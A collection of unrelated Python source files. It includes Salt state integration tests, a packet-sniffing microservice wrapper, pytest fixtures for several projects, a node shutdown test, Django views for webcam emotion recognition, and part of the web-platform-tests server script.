'comment: "Specified path /path/to/a/non-existent/file.txt does not exist"\n'
'Attempt 2: Returned a result of "False", with the following comment: "Specified'
' path /path/to/a/non-existent/file.txt does not exist"\nAttempt 3: Returned'
' a result of "False", with the following comment: "Specified path'
' /path/to/a/non-existent/file.txt does not exist"\nAttempt 4: Returned a'
' result of "False", with the following comment: "Specified path'
' /path/to/a/non-existent/file.txt does not exist"\nSpecified path'
' /path/to/a/non-existent/file.txt does not exist')
self.assertEqual(state_run[retry_state]['comment'], expected_comment)
self.assertTrue(state_run[retry_state]['duration'] > 40)
self.assertEqual(state_run[retry_state]['result'], False)
def test_retry_option_success(self):
'''
test a state with the retry option that should return True immedietly (i.e. no retries)
'''
testfile = os.path.join(TMP, 'retry_file')
state_run = self.run_function(
'state.sls',
mods='retry.retry_success'
)
os.unlink(testfile)
retry_state = 'file_|-file_test_|-{0}_|-exists'.format(testfile)
self.assertNotIn('Attempt', state_run[retry_state]['comment'])
def run_create(self):
'''
helper function to wait 30 seconds and then create the temp retry file
'''
testfile = os.path.join(TMP, 'retry_file')
time.sleep(30)
with salt.utils.files.fopen(testfile, 'a'):
pass
def test_retry_option_eventual_success(self):
'''
test a state with the retry option that should return True after at least 4 retry attmempt
but never run 15 attempts
'''
testfile = os.path.join(TMP, 'retry_file')
create_thread = threading.Thread(target=self.run_create)
create_thread.start()
state_run = self.run_function(
'state.sls',
mods='retry.retry_success2'
)
retry_state = 'file_|-file_test_|-{0}_|-exists'.format(testfile)
self.assertIn('Attempt 1:', state_run[retry_state]['comment'])
self.assertIn('Attempt 2:', state_run[retry_state]['comment'])
self.assertIn('Attempt 3:', state_run[retry_state]['comment'])
self.assertIn('Attempt 4:', state_run[retry_state]['comment'])
self.assertNotIn('Attempt 15:', state_run[retry_state]['comment'])
self.assertEqual(state_run[retry_state]['result'], True)
def test_issue_38683_require_order_failhard_combination(self):
'''
This tests the case where require, order, and failhard are all used together in a state definition.
Previously, the order option, which used in tandem with require and failhard, would cause the state
compiler to stacktrace. This exposed a logic error in the ``check_failhard`` function of the state
compiler. With the logic error resolved, this test should now pass.
See https://github.com/saltstack/salt/issues/38683 for more information.
'''
state_run = self.run_function(
'state.sls',
mods='requisites.require_order_failhard_combo'
)
state_id = 'test_|-b_|-b_|-fail_with_changes'
self.assertIn(state_id, state_run)
self.assertEqual(state_run[state_id]['comment'], 'Failure!')
self.assertFalse(state_run[state_id]['result'])
def test_issue_46762_prereqs_on_a_state_with_unfulfilled_requirements(self):
'''
This tests the case where state C requires state A, which fails.
State C is a pre-required state for State B.
Since state A fails, state C will not run because the requisite failed,
therefore state B will not run because state C failed to run.
See https://github.com/saltstack/salt/issues/46762 for
more information.
'''
state_run = self.run_function(
'state.sls',
mods='issue-46762'
)
state_id = 'test_|-a_|-a_|-fail_without_changes'
self.assertIn(state_id, state_run)
self.assertEqual(state_run[state_id]['comment'],
'Failure!')
self.assertFalse(state_run[state_id]['result'])
state_id = 'test_|-b_|-b_|-nop'
self.assertIn(state_id, state_run)
self.assertEqual(state_run[state_id]['comment'],
'One or more requisite failed: issue-46762.c')
self.assertFalse(state_run[state_id]['result'])
state_id = 'test_|-c_|-c_|-nop'
self.assertIn(state_id, state_run)
self.assertEqual(state_run[state_id]['comment'],
'One or more requisite failed: issue-46762.a')
self.assertFalse(state_run[state_id]['result'])
def test_state_nonbase_environment(self):
'''
test state.sls with saltenv using a nonbase environment
with a salt source
'''
filename = os.path.join(TMP, 'nonbase_env')
try:
ret = self.run_function(
'state.sls',
mods='non-base-env',
saltenv='prod'
)
ret = ret[next(iter(ret))]
assert ret['result']
assert ret['comment'] == 'File {0} updated'.format(filename)
assert os.path.isfile(filename)
finally:
try:
os.remove(filename)
except OSError:
pass
@skipIf(sys.platform.startswith('win'), 'Skipped until parallel states can be fixed on Windows')
def test_parallel_state_with_long_tag(self):
'''
This tests the case where the state being executed has a long ID dec or
name and states are being run in parallel. The filenames used for the
parallel state cache were previously based on the tag for each chunk,
and longer ID decs or name params can cause the cache file to be longer
than the operating system's max file name length. To counter this we
instead generate a SHA1 hash of the chunk's tag to use as the cache
filename. This test will ensure that long tags don't cause caching
failures.
See https://github.com/saltstack/salt/issues/49738 for more info.
'''
short_command = 'helloworld'
long_command = short_command * 25
ret = self.run_function(
'state.sls',
mods='issue-49738',
pillar={'short_command': short_command,
'long_command': long_command}
)
comments = sorted([x['comment'] for x in six.itervalues(ret)])
expected = sorted(['Command "{0}" run'.format(x)
for x in (short_command, long_command)])
assert comments == expected, '{0} != {1}'.format(comments, expected)
def _add_runtime_pillar(self, pillar):
'''
helper class to add pillar data at runtime
'''
import salt.utils.yaml
with salt.utils.files.fopen(os.path.join(TMP_PILLAR_TREE,
'pillar.sls'), 'w') as fp:
salt.utils.yaml.safe_dump(pillar, fp)
with salt.utils.files.fopen(os.path.join(TMP_PILLAR_TREE, 'top.sls'), 'w') as fp:
fp.write(textwrap.dedent('''\
base:
'*':
- pillar
'''))
self.run_function('saltutil.refresh_pillar')
self.run_function('test.sleep', [5])
def test_state_sls_id_test(self):
'''
test state.sls_id when test is set
to true in pillar data
'''
self._add_runtime_pillar(pillar={'test': True})
testfile = os.path.join(TMP, 'testfile')
comment = 'The file {0} is set to be changed'.format(testfile)
ret = self.run_function('state.sls', ['core'])
for key, val in ret.items():
self.assertEqual(val['comment'], comment)
self.assertEqual(val['changes'], {'newfile': testfile})
def test_state_sls_id_test_state_test_post_run(self):
'''
test state.sls_id when test is set to
true post the state already being run previously
'''
file_name = os.path.join(TMP, 'testfile')
ret = self.run_function('state.sls', ['core'])
for key, val in ret.items():
self.assertEqual(val['comment'],
'File {0} updated'.format(file_name))
self.assertEqual(val['changes']['diff'], 'New file')
self._add_runtime_pillar(pillar={'test': True})
ret = self.run_function('state.sls', ['core'])
for key, val in ret.items():
self.assertEqual(
val['comment'],
'The file {0} is in the correct state'.format(file_name))
self.assertEqual(val['changes'], {})
def test_state_sls_id_test_true(self):
'''
test state.sls_id when test=True is passed as arg
'''
file_name = os.path.join(TMP, 'testfile')
ret = self.run_function('state.sls', ['core'], test=True)
for key, val in ret.items():
self.assertEqual(
val['comment'],
'The file {0} is set to be changed'.format(file_name))
self.assertEqual(val['changes'], {'newfile': file_name})
def test_state_sls_id_test_true_post_run(self):
'''
test state.sls_id when test is set to true as an
arg post the state already being run previously
'''
file_name = os.path.join(TMP, 'testfile')
ret = self.run_function('state.sls', ['core'])
for key, val in ret.items():
self.assertEqual(val['comment'],
'File {0} updated'.format(file_name))
self.assertEqual(val['changes']['diff'], 'New file')
ret = self.run_function('state.sls', ['core'], test=True)
for key, val in ret.items():
self.assertEqual(
val['comment'],
'The file {0} is in the correct state'.format(file_name))
self.assertEqual(val['changes'], {})
def test_state_sls_id_test_false_pillar_true(self):
'''
test state.sls_id when test is set to false as an
arg and minion_state_test is set to True. Should
return test=False.
'''
file_name = os.path.join(TMP, 'testfile')
self._add_runtime_pillar(pillar={'test': True})
ret = self.run_function('state.sls', ['core'], test=False)
for key, val in ret.items():
self.assertEqual(val['comment'],
'File {0} updated'.format(file_name))
self.assertEqual(val['changes']['diff'], 'New file')
def test_state_sls_unicode_characters(self):
'''
test state.sls when state file contains non-ascii characters
'''
ret = self.run_function('state.sls', ['issue-46672'])
log.debug('== ret %s ==', type(ret))
_expected = "cmd_|-echo1_|-echo 'This is Æ test!'_|-run"
self.assertIn(_expected, ret)
def test_state_sls_unicode_characters_cmd_output(self):
'''
test the output from running and echo command with non-ascii
characters.
'''
ret = self.run_function('state.sls', ['issue-46672-a'])
key = list(ret.keys())[0]
log.debug('== ret %s ==', type(ret))
_expected = 'This is Æ test!'
if salt.utils.platform.is_windows():
# Windows cmd.exe will mangle the output using cmd's codepage.
if six.PY2:
_expected = "'This is A+ test!'"
else:
_expected = "'This is ’ test!'"
self.assertEqual(_expected, ret[key]['changes']['stdout'])
def tearDown(self):
nonbase_file = os.path.join(TMP, 'nonbase_env')
if os.path.isfile(nonbase_file):
os.remove(nonbase_file)
# remove old pillar data
for filename in os.listdir(TMP_PILLAR_TREE):
os.remove(os.path.join(TMP_PILLAR_TREE, filename))
self.run_function('saltutil.refresh_pillar')
self.run_function('test.sleep', [5])
# remove testfile added in core.sls state file
state_file = os.path.join(TMP, 'testfile')
if os.path.isfile(state_file):
os.remove(state_file)
def test_state_sls_integer_name(self):
'''
This tests the case where the state file is named
only with integers
'''
state_run = self.run_function(
'state.sls',
mods='12345'
)
state_id = 'test_|-always-passes_|-always-passes_|-succeed_without_changes'
self.assertIn(state_id, state_run)
self.assertEqual(state_run[state_id]['comment'],
'Success!')
self.assertTrue(state_run[state_id]['result'])
|
sniffing_service.py
|
from __future__ import absolute_import
import os
import sys
import time
sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), "..", "..")))
import threading
from threading import Lock
from topology.sniffer.daemon import SniffingDaemon
from topology.sniffer.devices import open_connection
from service.components import Component
from service.server import Server
from service.server import config
class PacketExporter(Component):
"""
Component used to export packets.
The packets that are taken from the list of shared packets are then
discarded from the list of shared packets.
"""
def __init__(self, shared_packets, lock):
self.shared_packets = shared_packets
self.lock = lock
def process(self, unused=None):
"""
:return: returns a list of packets as a dictionary
"""
self.lock.acquire()
packets = self.shared_packets[:]
self.shared_packets[:] = []
self.lock.release()
return packets
class SniffingService():
"""
Wrapper over:
- the server with a PacketExporter component
- the shared_list of packets and the shared_lock
Shares the `shared_list` of packets with the sniffing daemon.
"""
def __init__(self, device):
shared_lock = Lock()
shared_list = []
self.server = Server("sniffer", config["sniffer"])
self.server.add_component_get("/newpackets",
PacketExporter(shared_list, shared_lock))
if device is None:
self.daemon = SniffingDaemon(shared_list, shared_lock)
else:
self.daemon = SniffingDaemon(shared_list, shared_lock, connections=open_connection(device))
def sniffing_service(device=None, filter_mask=None):
"""
Function used to start the sniffing microservice.
"""
service = SniffingService(device)
threading.Thread(target=service.server.run).start()
if filter_mask is not None:
threading.Thread(target=lambda: service.daemon.run(filter_mask)).start()
else:
threading.Thread(target=service.daemon.run).start()
while True:
pass
if __name__ == "__main__":
sniffing_service()
|
conftest.py
|
import pytest
import math
@pytest.fixture(scope='function')
def IpcServer():
from gpopup import ipc
from random import randint
val = ipc.Server._default_sock_name()
rando = '_' + '{:d}'.format(randint(0, int(1e6)))
class _IpcServer(ipc.Server):
@classmethod
def _default_sock_name(cls):
return val + rando
return _IpcServer
@pytest.fixture(scope='function')
def echo_client(IpcServer):
Client = IpcServer.get_client()
c = Client()
c.start_server_maybe()
yield c
c.kill_server()
@pytest.fixture(scope='function')
def MathServer(IpcServer):
class _MathServer(IpcServer):
def cmd_cos(self, *pargs, **kwargs):
return math.cos(*pargs, **kwargs)
def cmd_erf(self, x):
"Calculate the error function of x"
return math.erf(x)
return _MathServer
@pytest.fixture(scope='function')
def math_client(MathServer):
Client = MathServer.get_client()
c = Client()
c.start_server_maybe()
yield c
c.kill_server()
@pytest.fixture(scope='function')
def message_types():
from gpopup import message_types
return message_types
@pytest.fixture(scope='function')
def gpopup_server():
from subprocess import Popen
p = Popen(['gpopup-server', '--force-bind'])
yield p
p.terminate()
p.kill()
@pytest.fixture(scope='function')
def notifier_server():
from gpopup.notifier import NotifierServer
from threading import Thread
t = Thread(target=lambda: NotifierServer().run(background=False))
t.start()
yield t
t.join(timeout=2.0)
@pytest.fixture(scope='function')
def notifier_client(notifier_server):
from gpopup.notifier import NotifierClient
c = NotifierClient()
yield c
c.kill_server()
|
feature_shutdown.py
|
#!/usr/bin/env python3
# Copyright (c) 2018 The Bitcoin Core developers
# Copyright (c) 2017-2020 The Zelantus Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test zelantusd shutdown."""
from threading import Thread
from test_framework.test_framework import ZelantusTestFramework
from test_framework.util import assert_equal, get_rpc_proxy, wait_until
def test_long_call(node):
block = node.waitfornewblock(5000)
assert_equal(block['height'], 0)
class ShutdownTest(ZelantusTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
def run_test(self):
node = get_rpc_proxy(self.nodes[0].url, 1, timeout=600, coverage_dir=self.nodes[0].coverage_dir)
# Force connection establishment by executing a dummy command.
node.getblockcount()
Thread(target=test_long_call, args=(node,)).start()
# Wait until the server is executing the above `waitfornewblock`.
wait_until(lambda: len(self.nodes[0].getrpcinfo()['active_commands']) == 2, err_msg="wait until getrpcinfo active commands")
# Wait 1 second after requesting shutdown but not before the `stop` call
# finishes. This is to ensure event loop waits for current connections
# to close.
self.stop_node(0) #, wait=1000)
if __name__ == '__main__':
ShutdownTest().main()
|
launch_two.py
|
from server import Main as Server
from tkinter.font import Font
from random import randint
from tkinter import *
import threading
import socket
import select
from client import Main as client
from time import sleep
def StartClient1():
main1 = client()
def StartClient2():
main2 = client()
threading.Thread(target=StartClient1).start()
StartClient2()
|
conftest.py
|
import os
import shutil
import pytest
from time import sleep
import multiprocessing
from grpc import RpcError
from multiprocessing import Process
from teos.teosd import main
from teos.cli.teos_cli import RPCClient
from common.cryptographer import Cryptographer
from test.teos.conftest import config
multiprocessing.set_start_method("spawn")
# This fixture needs to be manually run on the first E2E.
@pytest.fixture(scope="module")
def teosd(run_bitcoind):
teosd_process, teos_id = run_teosd()
yield teosd_process, teos_id
# FIXME: This is not ideal, but for some reason stop raises socket being closed on the first try here.
stopped = False
while not stopped:
try:
rpc_client = RPCClient(config.get("RPC_BIND"), config.get("RPC_PORT"))
rpc_client.stop()
stopped = True
except RpcError:
print("failed")
pass
teosd_process.join()
shutil.rmtree(".teos", ignore_errors=True)
# FIXME: wait some time, otherwise it might fail when multiple e2e tests are ran in the same session. Not sure why.
sleep(1)
def run_teosd():
sk_file_path = os.path.join(config.get("DATA_DIR"), "teos_sk.der")
if not os.path.exists(sk_file_path):
# Generating teos sk so we can return the teos_id
teos_sk = Cryptographer.generate_key()
Cryptographer.save_key_file(teos_sk.to_der(), "teos_sk", config.get("DATA_DIR"))
else:
teos_sk = Cryptographer.load_private_key_der(Cryptographer.load_key_file(sk_file_path))
teos_id = Cryptographer.get_compressed_pk(teos_sk.public_key)
# Change the default WSGI for Windows
if os.name == "nt":
config["WSGI"] = "waitress"
teosd_process = Process(target=main, kwargs={"config": config})
teosd_process.start()
# Give it some time to bootstrap
# TODO: we should do better synchronization using an Event
sleep(3)
return teosd_process, teos_id
def build_appointment_data(commitment_tx_id, penalty_tx):
appointment_data = {"tx": penalty_tx, "tx_id": commitment_tx_id, "to_self_delay": 20}
return appointment_data
|
views.py
|
# Django related libs
from django.shortcuts import render
from django.http import StreamingHttpResponse
from django.core.files.base import ContentFile
from django.core.files import File
#libraries existing in the project
from .models import Image
from .forms import ImageForm, TempForm
from backend.settings import BASE_DIR
# Standard Libraries
import os
import threading
import io
# 3rd Party Libraries
import cv2
import PIL
import numpy as np
import tensorflow as tf
from tensorflow.keras.models import load_model
#Constants
IMG_SIZE = 48
EMOTIONS = ["afraid", "angry", "disgust", "happy", "neutral", "sad", "surprised"]
HF = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')
#Views
def home(request):
'''
Home view manages the first page of the website
'''
return render(request, 'index.html', {})
def predict(request):
'''
The Heart of the project,
From here the user will be able to ask for recommendation
'''
return render(request, 'predict.html', {})
def prepare(img):
SIZE = 48 # image size
img_array = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
img_array=img_array/255.0
new_array = cv2.resize(img_array, (SIZE, SIZE)) # resize image to match model's expected sizing
return new_array.reshape(-1,SIZE, SIZE,1)
def predict_image(image_array, category, name_image):
try:
print('Inside predict_image shape: {}'.format(image_array.shape))
gray = cv2.cvtColor(image_array, cv2.COLOR_BGR2GRAY)
img = image_array.copy()
faces = HF.detectMultiScale(gray, 1.3, 8)
try:
faces = sorted(faces, reverse=True, key = lambda x: (x[2]-x[0]) *(x[3]-x[1]))[0]
(x,y,w,h)=faces
img = cv2.rectangle(img,(x,y),(x+w,y+h),(220,40,50),2)
roi = img[y:y+h, x:x+w]
model_path = os.path.join(BASE_DIR, '6/')
model=load_model(model_path, compile=False)
print('Image shape is {}'.format(img.shape))
prediction = model.predict([prepare(roi)])
preds = prediction[0]
label = EMOTIONS[preds.argmax()]
cv2.rectangle(img,(x,y+h+10),(x+w,y+h+70),(220,40,50),-2)
cv2.putText(img,label, (x+10, y+h+50), cv2.FONT_HERSHEY_SIMPLEX, 1.3, (225, 225, 225), 3)
except:
print("Something happened during prediction")
_, buffer_img = cv2.imencode('.jpeg', img)
f_img = buffer_img.tobytes()
f1 = ContentFile(f_img)
image_file = File(f1, name=name_image)
return image_file, label
except Exception as e:
print(e)
def form_view(request):
flag = 0
context_dict = {}
upload_image = Image()
modified_image = Image()
temp_form = TempForm({'recommend': 'no'})
image_form = ImageForm()
if request.method=="POST":
temp_form = TempForm(request.POST)
t_value=request.POST.get('recommend')
if t_value == 'yes':
print("YEs it is happening")
img_obj = Image.objects.filter().order_by('-id')[0]
print("image object = {}".format(img_obj))
print("image object image = {}".format(img_obj.uploads))
category = img_obj.category
name_image = img_obj.uploads.name
print(name_image)
print(type(img_obj))
print('retrieved')
test_image = img_obj.uploads
image_bytes = test_image.reads()
target_image = PIL.Image.open(io.BytesIO(image_bytes))
target_image = target_image.resize((IMG_SIZE, IMG_SIZE), PIL.Image.ANTIALIAS)
print(type(target_image))
image_array = np.array(target_image)
image_file, x1 = predict_image(image_array, category, name_image)
print('Image_file type: {}'.format(type(image_file)))
modified_image.uploads = img_obj.uploads
print("next step")
modified_image.save()
context_dict = {'form': image_form, 'temp_form': temp_form, 'prediction': x1, 'image_show': modified_image}
else:
image_form = ImageForm(request.POST, request.FILES)
if image_form.is_valid():
print('inside form.valid function')
category = image_form.cleaned_data['category']
if request.FILES.get("uploads", None) is not None:
print("image prese")
test_image = request.FILES["uploads"]
image_byte = test_image.read()
target_image = PIL.Image.open(io.BytesIO(image_byte))
name_image = image_form.cleaned_data['uploads'].name
flag = 1
if 'uploads' in request.FILES:
print('inside function')
upload_image.category = image_form.cleaned_data['category']
upload_image.uploads = request.FILES['uploads']
upload_image.save()
print('Saved image -> {}'.format(upload_image.uploads.name))
upload_obj = Image.objects.filter().order_by('-id')[0]
image_id = upload_obj.id
print("Upload obj is {} ".format(upload_obj))
print("image id = {}".format(image_id))
print("Image show is {} and type is {} and URL is {} ".format(upload_image.uploads, type(upload_image), upload_image.uploads.url))
context_dict = {'form': image_form, 'temp_form': temp_form, 'image_show': upload_image }
else:
print("These are image errors")
print(image_form.errors)
else:
image_form = ImageForm()
context_dict = {'form': image_form, 'temp_form': temp_form}
print(context_dict)
print("This is the last step")
print("Context dict is {}".format(context_dict))
return render(request, 'statRes.html', context=context_dict)
def capture_from_cam():
cap = cv2.VideoCapture(0)
currentFrame = 0
while True:
ret, frame = cap.read()
frame = cv2.flip(frame, 1)
currentFrame += 1
print("The function is over")
class VideoCapture(object):
def __init__(self):
self.video = cv2.VideoCapture(0)
(self.grabbed, self.read) = self.video.read()
threading.Thread(target=self.update, args=()).start()
def __del__(self):
self.video.release()
def get_frame(self):
image = self.frame
ret, jpeg = cv2.imencode('.jpg', image )
return jpeg.tobytes()
def update(self):
while True:
(self.grabbed, self.frame) = self.video.read()
#cam = VideoCapture()
def gen(camera):
while True:
frame = cam.get_frame()
yield(b'--frame \r\n'
b'Content-Type: image/jpeg\r\n\r\n' + frame + b'\r\n\r\n')
# I am following code from here https://stackoverflow.com/questions/49680152/opencv-live-stream-from-camera-in-django-webpage
# to implement a webcam
def livefe(request):
try:
return StreamingHttpResponse(capture_from_cam())
except:
print("Error occured")
|
serve.py
|
import abc
import argparse
import importlib
import json
import logging
import multiprocessing
import os
import platform
import subprocess
import sys
import threading
import time
import traceback
import urllib
import uuid
from collections import defaultdict, OrderedDict
from itertools import chain, product
from typing import ClassVar, List, Set, Tuple
from localpaths import repo_root # type: ignore
from manifest.sourcefile import read_script_metadata, js_meta_re, parse_variants # type: ignore
from wptserve import server as wptserve, handlers
from wptserve import stash
from wptserve import config
from wptserve.handlers import filesystem_path, wrap_pipeline
from wptserve.utils import get_port, HTTPException, http2_compatible
from mod_pywebsocket import standalone as pywebsocket
EDIT_HOSTS_HELP = ("Please ensure all the necessary WPT subdomains "
"are mapped to a loopback device in /etc/hosts.\n"
"See https://web-platform-tests.org/running-tests/from-local-system.html#system-setup "
"for instructions.")
def replace_end(s, old, new):
"""
Given a string `s` that ends with `old`, replace that occurrence of `old`
with `new`.
"""
assert s.endswith(old)
return s[:-len(old)] + new
def domains_are_distinct(a, b):
a_parts = a.split(".")
b_parts = b.split(".")
min_length = min(len(a_parts), len(b_parts))
slice_index = -1 * min_length
return a_parts[slice_index:] != b_parts[slice_index:]
class WrapperHandler(object):
__meta__ = abc.ABCMeta
headers = [] # type: ClassVar[List[Tuple[str, str]]]
def __init__(self, base_path=None, url_base="/"):
self.base_path = base_path
self.url_base = url_base
self.handler = handlers.handler(self.handle_request)
def __call__(self, request, response):
self.handler(request, response)
def handle_request(self, request, response):
headers = self.headers + handlers.load_headers(
request, self._get_filesystem_path(request))
for header_name, header_value in headers:
response.headers.set(header_name, header_value)
self.check_exposure(request)
path = self._get_path(request.url_parts.path, True)
query = request.url_parts.query
if query:
query = "?" + query
meta = "\n".join(self._get_meta(request))
script = "\n".join(self._get_script(request))
response.content = self.wrapper % {"meta": meta, "script": script, "path": path, "query": query}
wrap_pipeline(path, request, response)
def _get_path(self, path, resource_path):
"""Convert the path from an incoming request into a path corresponding to an "unwrapped"
resource e.g. the file on disk that will be loaded in the wrapper.
:param path: Path from the HTTP request
:param resource_path: Boolean used to control whether to get the path for the resource that
this wrapper will load or the associated file on disk.
Typically these are the same but may differ when there are multiple
layers of wrapping e.g. for a .any.worker.html input the underlying disk file is
.any.js but the top level html file loads a resource with a
.any.worker.js extension, which itself loads the .any.js file.
If True return the path to the resource that the wrapper will load,
otherwise return the path to the underlying file on disk."""
for item in self.path_replace:
if len(item) == 2:
src, dest = item
else:
assert len(item) == 3
src = item[0]
dest = item[2 if resource_path else 1]
if path.endswith(src):
path = replace_end(path, src, dest)
return path
def _get_filesystem_path(self, request):
"""Get the path of the underlying resource file on disk."""
return self._get_path(filesystem_path(self.base_path, request, self.url_base), False)
def _get_metadata(self, request):
"""Get an iterator over script metadata based on // META comments in the
associated js file.
:param request: The Request being processed.
"""
path = self._get_filesystem_path(request)
try:
with open(path, "rb") as f:
for key, value in read_script_metadata(f, js_meta_re):
yield key, value
except IOError:
raise HTTPException(404)
def _get_meta(self, request):
"""Get an iterator over strings to inject into the wrapper document
based on // META comments in the associated js file.
:param request: The Request being processed.
"""
for key, value in self._get_metadata(request):
replacement = self._meta_replacement(key, value)
if replacement:
yield replacement
def _get_script(self, request):
"""Get an iterator over strings to inject into the wrapper document
based on // META comments in the associated js file.
:param request: The Request being processed.
"""
for key, value in self._get_metadata(request):
replacement = self._script_replacement(key, value)
if replacement:
yield replacement
@abc.abstractproperty
def path_replace(self):
# A list containing a mix of 2 item tuples with (input suffix, output suffix)
# and 3-item tuples with (input suffix, filesystem suffix, resource suffix)
# for the case where we want a different path in the generated resource to
# the actual path on the filesystem (e.g. when there is another handler
# that will wrap the file).
return None
@abc.abstractproperty
def wrapper(self):
# String template with variables path and meta for wrapper document
return None
@abc.abstractmethod
def _meta_replacement(self, key, value):
# Get the string to insert into the wrapper document, given
# a specific metadata key: value pair.
pass
@abc.abstractmethod
def check_exposure(self, request):
# Raise an exception if this handler shouldn't be exposed after all.
pass
class HtmlWrapperHandler(WrapperHandler):
global_type = None # type: ClassVar[str]
headers = [('Content-Type', 'text/html')]
def check_exposure(self, request):
if self.global_type:
globals = u""
for (key, value) in self._get_metadata(request):
if key == "global":
globals = value
break
if self.global_type not in parse_variants(globals):
raise HTTPException(404, "This test cannot be loaded in %s mode" %
self.global_type)
def _meta_replacement(self, key, value):
if key == "timeout":
if value == "long":
return '<meta name="timeout" content="long">'
if key == "title":
value = value.replace("&", "&").replace("<", "<")
return '<title>%s</title>' % value
return None
def _script_replacement(self, key, value):
if key == "script":
attribute = value.replace("&", "&").replace('"', """)
return '<script src="%s"></script>' % attribute
return None
class WorkersHandler(HtmlWrapperHandler):
global_type = "dedicatedworker"
path_replace = [(".any.worker.html", ".any.js", ".any.worker.js"),
(".worker.html", ".worker.js")]
wrapper = """<!doctype html>
<meta charset=utf-8>
%(meta)s
<script src="/resources/testharness.js"></script>
<script src="/resources/testharnessreport.js"></script>
<div id=log></div>
<script>
fetch_tests_from_worker(new Worker("%(path)s%(query)s"));
</script>
"""
class WorkerModulesHandler(HtmlWrapperHandler):
global_type = "dedicatedworker-module"
path_replace = [(".any.worker-module.html", ".any.js", ".any.worker-module.js"),
(".worker.html", ".worker.js")]
wrapper = """<!doctype html>
<meta charset=utf-8>
%(meta)s
<script src="/resources/testharness.js"></script>
<script src="/resources/testharnessreport.js"></script>
<div id=log></div>
<script>
fetch_tests_from_worker(new Worker("%(path)s%(query)s", { type: "module" }));
</script>
"""
class WindowHandler(HtmlWrapperHandler):
path_replace = [(".window.html", ".window.js")]
wrapper = """<!doctype html>
<meta charset=utf-8>
%(meta)s
<script src="/resources/testharness.js"></script>
<script src="/resources/testharnessreport.js"></script>
%(script)s
<div id=log></div>
<script src="%(path)s"></script>
"""
class AnyHtmlHandler(HtmlWrapperHandler):
global_type = "window"
path_replace = [(".any.html", ".any.js")]
wrapper = """<!doctype html>
<meta charset=utf-8>
%(meta)s
<script>
self.GLOBAL = {
isWindow: function() { return true; },
isWorker: function() { return false; },
};
</script>
<script src="/resources/testharness.js"></script>
<script src="/resources/testharnessreport.js"></script>
%(script)s
<div id=log></div>
<script src="%(path)s"></script>
"""
class SharedWorkersHandler(HtmlWrapperHandler):
global_type = "sharedworker"
path_replace = [(".any.sharedworker.html", ".any.js", ".any.worker.js")]
wrapper = """<!doctype html>
<meta charset=utf-8>
%(meta)s
<script src="/resources/testharness.js"></script>
<script src="/resources/testharnessreport.js"></script>
<div id=log></div>
<script>
fetch_tests_from_worker(new SharedWorker("%(path)s%(query)s"));
</script>
"""
class SharedWorkerModulesHandler(HtmlWrapperHandler):
global_type = "sharedworker-module"
path_replace = [(".any.sharedworker-module.html", ".any.js", ".any.worker-module.js")]
wrapper = """<!doctype html>
<meta charset=utf-8>
%(meta)s
<script src="/resources/testharness.js"></script>
<script src="/resources/testharnessreport.js"></script>
<div id=log></div>
<script>
fetch_tests_from_worker(new SharedWorker("%(path)s%(query)s", { type: "module" }));
</script>
"""
class ServiceWorkersHandler(HtmlWrapperHandler):
global_type = "serviceworker"
path_replace = [(".any.serviceworker.html", ".any.js", ".any.worker.js")]
wrapper = """<!doctype html>
<meta charset=utf-8>
%(meta)s
<script src="/resources/testharness.js"></script>
<script src="/resources/testharnessreport.js"></script>
<div id=log></div>
<script>
(async function() {
const scope = 'does/not/exist';
let reg = await navigator.serviceWorker.getRegistration(scope);
if (reg) await reg.unregister();
reg = await navigator.serviceWorker.register("%(path)s%(query)s", {scope});
fetch_tests_from_worker(reg.installing);
})();
</script>
"""
class ServiceWorkerModulesHandler(HtmlWrapperHandler):
global_type = "serviceworker-module"
path_replace = [(".any.serviceworker-module.html",
".any.js", ".any.worker-module.js")]
wrapper = """<!doctype html>
<meta charset=utf-8>
%(meta)s
<script src="/resources/testharness.js"></script>
<script src="/resources/testharnessreport.js"></script>
<div id=log></div>
<script>
(async function() {
const scope = 'does/not/exist';
let reg = await navigator.serviceWorker.getRegistration(scope);
if (reg) await reg.unregister();
reg = await navigator.serviceWorker.register(
"%(path)s%(query)s",
{ scope, type: 'module' },
);
fetch_tests_from_worker(reg.installing);
})();
</script>
"""
class BaseWorkerHandler(WrapperHandler):
headers = [('Content-Type', 'text/javascript')]
def _meta_replacement(self, key, value):
return None
@abc.abstractmethod
def _create_script_import(self, attribute):
# Take attribute (a string URL to a JS script) and return JS source to import the script
# into the worker.
pass
def _script_replacement(self, key, value):
if key == "script":
attribute = value.replace("\\", "\\\\").replace('"', '\\"')
return self._create_script_import(attribute)
if key == "title":
value = value.replace("\\", "\\\\").replace('"', '\\"')
return 'self.META_TITLE = "%s";' % value
return None
class ClassicWorkerHandler(BaseWorkerHandler):
path_replace = [(".any.worker.js", ".any.js")]
wrapper = """%(meta)s
self.GLOBAL = {
isWindow: function() { return false; },
isWorker: function() { return true; },
};
importScripts("/resources/testharness.js");
%(script)s
importScripts("%(path)s");
done();
"""
def _create_script_import(self, attribute):
return 'importScripts("%s")' % attribute
class ModuleWorkerHandler(BaseWorkerHandler):
path_replace = [(".any.worker-module.js", ".any.js")]
wrapper = """%(meta)s
self.GLOBAL = {
isWindow: function() { return false; },
isWorker: function() { return true; },
};
import "/resources/testharness.js";
%(script)s
import "%(path)s";
done();
"""
def _create_script_import(self, attribute):
return 'import "%s";' % attribute
rewrites = [("GET", "/resources/WebIDLParser.js", "/resources/webidl2/lib/webidl2.js")]
class RoutesBuilder(object):
def __init__(self):
self.forbidden_override = [("GET", "/tools/runner/*", handlers.file_handler),
("POST", "/tools/runner/update_manifest.py",
handlers.python_script_handler)]
self.forbidden = [("*", "/_certs/*", handlers.ErrorHandler(404)),
("*", "/tools/*", handlers.ErrorHandler(404)),
("*", "{spec}/tools/*", handlers.ErrorHandler(404)),
("*", "/results/", handlers.ErrorHandler(404))]
self.extra = []
self.mountpoint_routes = OrderedDict()
self.add_mount_point("/", None)
def get_routes(self):
routes = self.forbidden_override + self.forbidden + self.extra
# Using reversed here means that mount points that are added later
# get higher priority. This makes sense since / is typically added
# first.
for item in reversed(self.mountpoint_routes.values()):
routes.extend(item)
return routes
def add_handler(self, method, route, handler):
self.extra.append((str(method), str(route), handler))
def add_static(self, path, format_args, content_type, route, headers=None):
if headers is None:
headers = {}
